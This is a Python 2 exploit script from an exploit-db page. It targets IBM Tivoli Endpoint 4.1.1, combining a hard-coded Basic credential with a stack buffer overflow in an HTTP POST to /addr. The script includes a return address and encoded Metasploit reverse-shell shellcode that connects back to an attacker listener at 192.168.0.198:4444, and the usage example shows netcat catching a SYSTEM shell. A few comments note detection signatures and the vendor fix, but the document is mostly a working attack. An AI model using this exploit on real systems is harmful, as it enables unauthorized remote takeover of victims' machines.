IBM Tivoli Endpoint 4.1.1 – Remote SYSTEM

  • 作者: Jeremy Brown
    日期: 2011-06-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17365/
  • #!/usr/bin/python
    # tiv-sys.py
    # IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit
    # Jeremy Brown [0xjbrown41-gmail-com]
    # June 2011
    #
    # Discovered by: Brian Adeloye of Tenable Network Security
    #
    # This exploit makes use of two vulnerabilities:
    #
    # 1) Base64 authentication credentials hard-coded in lcfd.exe
    # 2) Stack-based buffer overflow when parsing HTTP variable values
    #
    # Tested on Tivoli Endpoint 4.1.1-LCF-0048 running on Windows XP SP3
    #
    # $ python tiv-sys.py 192.168.0.188
    # .....
    # $ nc -v -l 4444
    # Connection from 192.168.0.188 port 4444 [tcp/*] accepted
    # Microsoft Windows XP [Version 5.1.2600]
    # (C) Copyright 1985-2001 Microsoft Corp.
    #
    # C:\Program Files\Tivoli\lcf\dat\1>
    #
    # References:
    #
    # http://www.zerodayinitiative.com/advisories/ZDI-11-169/
    # https://www-304.ibm.com/support/docview.wss?uid=swg21499146
    #
    
    import sys
    import struct
    import socket
    import httplib
    import urllib
    
    # Default port of the Tivoli Endpoint (lcfd) HTTP listener; an optional
    # second command-line argument overrides it (see below).
    port=9495
    
    # Hard-coded return address and filler. The address is specific to the
    # user32.dll build of the tested platform (Windows XP SP3, see header),
    # which is why the header lists exactly one tested configuration.
    ret=0x7C96BF33 # jmp esp @ user32.dll
    junk="B"*256
    
    # windows/shell_reverse_tcp - 333 bytes
    # http://www.metasploit.com
    # Encoder: x86/countdown
    # LHOST=192.168.0.198, LPORT=4444, ReverseConnectRetries=5, 
    # EXITFUNC=thread, InitialAutoRunScript=, AutoRunScript=
    # NOTE(review): pre-generated opaque byte string; the listener host/port
    # named above are baked into these bytes, not read from the CLI.
    payload=(
    "\x2b\xc9\x66\xb9\x39\x01\xe8\xff\xff\xff\xff\xc1\x5e\x30"
    "\x4c\x0e\x07\xe2\xfa\xfd\xea\x8a\x04\x05\x06\x67\x81\xec"
    "\x3b\xd9\x68\x86\x5c\x3f\x9b\x43\x1e\x98\x46\x01\x9d\x65"
    "\x30\x16\xad\x51\x3a\x2c\xe1\x2e\xe0\x8d\x1e\x42\x58\x27"
    "\x0a\x07\xe9\xe6\x27\x2a\xeb\xcf\xde\x7d\x67\xba\x60\x23"
    "\xbf\x77\x0a\x36\xe8\xb2\x7a\x43\xb9\xfd\x4a\x75\x41\x91"
    "\x12\xc8\x0c\x5d\xcd\x1f\x68\x48\x99\xa8\x70\x04\xc5\x7b"
    "\xdb\x50\x84\x62\xab\x64\x96\xfb\x99\x96\x57\x5a\x9b\x65"
    "\xbe\x2a\x94\x62\x1f\x9b\x5f\x18\x42\x12\x8a\x31\xe1\x33"
    "\x48\x6c\xbd\x09\xfb\x7d\x39\xf8\x2c\x69\x77\xa4\xf3\x7d"
    "\xf1\x7a\xac\xf4\x3a\x5b\xa4\xda\xd9\xe2\xdd\xdf\xd7\x78"
    "\x68\xd1\xd5\xd1\x07\x9f\x65\x09\xcd\xf9\xa1\xa1\x94\x95"
    "\xfe\xe0\xeb\xab\xc5\xcf\xf4\xd1\xe9\xb9\xa7\x5e\x77\x1b"
    "\x34\xa4\xa6\xa7\x81\x6d\xfe\xfb\xc4\x84\x2e\xc4\xb0\x4e"
    "\x67\xe3\xe4\xe5\xe6\xf7\xe8\xf9\xea\xd3\x56\xb2\x61\x5f"
    "\x3f\x14\x4b\x04\xac\x05\x6e\xc7\x0e\xa1\xc8\xcb\xdd\x91"
    "\x47\x29\xba\xc1\x84\x84\xbc\x4c\x73\xa3\xb9\x26\x0f\xb3"
    "\xbf\xb0\xba\xdf\x69\x02\xb5\xb4\xb3\xd4\x10\x8d\xfa\xb0"
    "\xbc\x09\x11\x8b\x29\xab\xd4\xcd\xf3\xf2\x79\xb1\xd2\xe7"
    "\x3e\xf9\xbe\xaf\xac\xab\xa8\xa9\x46\x57\x4c\x55\x52\x56"
    "\x50\x6f\x71\xc5\x35\x8d\xf3\xd8\x87\xef\x5e\x47\x54\xec"
    "\x24\x7d\x1e\x90\x05\x79\xe5\xce\xa7\xfd\x03\x35\x2a\x49"
    "\x84\xb6\x99\xb8\xd9\xf2\x14\x2f\x56\x21\xac\xd6\xce\x5a"
    "\x35\x8a\x75\x20\x46\x5a\x5c\x37\x6b\xc6\xef")
    
    # Argument handling: <target> is required, [port] optional.
    # Python 2 only: the print statement, httplib and urllib.urlencode below
    # do not exist under Python 3.
    if len(sys.argv)<2:
     print "Usage: "+sys.argv[0]+" <target> [port]"
     sys.exit(0)
    
    target=sys.argv[1]
    if len(sys.argv)==3:
     port=int(sys.argv[2])
    
    # Little-endian 32-bit packing of the return address (x86 target, per the
    # payload encoder noted above).
    retaddr=struct.pack("<L",ret)
    
    # One POST to /addr carrying the oversized value of HTTP variable "test"
    # (header item 2), authenticated with the hard-coded credential (header
    # item 1). Defender notes: the fixed Basic value below and a POST to
    # /addr with an oversized variable value are both usable as detection
    # signatures; mitigation is the vendor fix in the referenced IBM support
    # document plus restricting network reachability of port 9495.
    data=urllib.urlencode({"test":junk+retaddr+payload})
    size=5+len(junk)+len(retaddr)+len(payload) # 'test=' = 5 (also works with just '=')
    hdrs={"Host":"pw.n","Content-Length":size,"Authorization":"Basic dGl2b2xpOmJvc3M="} # tivoli:boss
    
    conn=httplib.HTTPConnection(target,port)
    conn.request("POST","/addr",data,hdrs)
    conn.close()